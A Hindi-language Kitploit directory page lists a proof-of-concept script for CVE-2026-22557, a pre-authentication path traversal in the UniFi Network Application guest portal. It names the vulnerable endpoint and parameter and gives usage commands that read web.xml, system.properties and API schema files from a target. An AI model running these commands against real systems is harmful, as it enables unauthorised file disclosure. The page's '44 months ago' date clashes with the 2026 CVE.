Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-22557-PoC — PoC for UniFi Network Application Pre-Auth Path Traversal (CVE-2026-22557) | Kitploit
उपकरण/GitHubGitHub/thepotatoofdoom/cve-2026-22557-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubthepotatoofdoom/cve-2026-22557-poc

CVE-2026-22557-PoC

PoC for UniFi Network Application Pre-Auth Path Traversal (CVE-2026-22557)

रिपॉजिटरी देखें
44 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-22557 -- UniFi नेटवर्क एप्लिकेशन प्री-ऑथ पाथ ट्रैवर्सल

UniFi नेटवर्क एप्लिकेशन गेस्ट पोर्टल (/guest/s/{site}/login) में प्री-ऑथेंटिकेटेड पाथ ट्रैवर्सल। page_error क्वेरी पैरामीटर को बिना सत्यापन के रिसोर्स लोडर को पास किया जाता है, जिससे एक अनऑथेंटिकेटेड हमलावर वेबऐप से फ़ाइलें पढ़ सकता है (जैसे WEB-INF/web.xml)।

यदि गेस्ट पोर्टल पेज को कस्टमाइज़ किया गया है, तो रिसोर्स लोडर एक रॉ FileInputStream शाखा पर वापस आता प्रतीत होता है जो कॉन्टेक्स्ट रूट के बाहर अंतर्निहित सिस्टम पर मनमानी फ़ाइलों तक पहुंच सकती है। मैंने अभी तक इसकी पुष्टि नहीं की है और समय मिलने पर आगे जांच करूंगा।

उपयोग

root@kitploit:~
pip install requests
python CVE-2026-22557.py <target_url> [-f FILE] [-g GUEST_PATH] [-o OUTPUT] [-x PROXY]
फ़्लैगविवरणडिफ़ॉल्ट
targetलक्ष्य URL (जैसे https://host:8843)(आवश्यक)
-fपढ़ने के लिए सापेक्ष पथ../../web.xml
-gगेस्ट पोर्टल पथ/guest/s/default/login
-oप्रतिक्रिया को फ़ाइल में लिखें(stdout)
-xप्रॉक्सी URL(कोई नहीं)

उदाहरण

image
root@kitploit:~
# डिफ़ॉल्ट -- WEB-INF/web.xml पढ़ें (HTTPS गेस्ट पोर्टल)
python CVE-2026-22557.py https://192.168.1.1:8843

# HTTP गेस्ट पोर्टल
python CVE-2026-22557.py http://192.168.1.1:8880

# क्लासपाथ रिसोर्स पढ़ें
python CVE-2026-22557.py https://192.168.1.1:8843 -f ../system.properties

# API स्कीमा पढ़ें और फ़ाइल में सहेजें
python CVE-2026-22557.py https://192.168.1.1:8843 -f ../api/fields/Setting.json -o setting.json

# अलग साइट नाम
python CVE-2026-22557.py https://192.168.1.1:8843 -g /guest/s/mysite/login

# प्रॉक्सी के माध्यम से
python CVE-2026-22557.py https://192.168.1.1:8843 -x http://127.0.0.1:8080
टूल डाउनलोड करें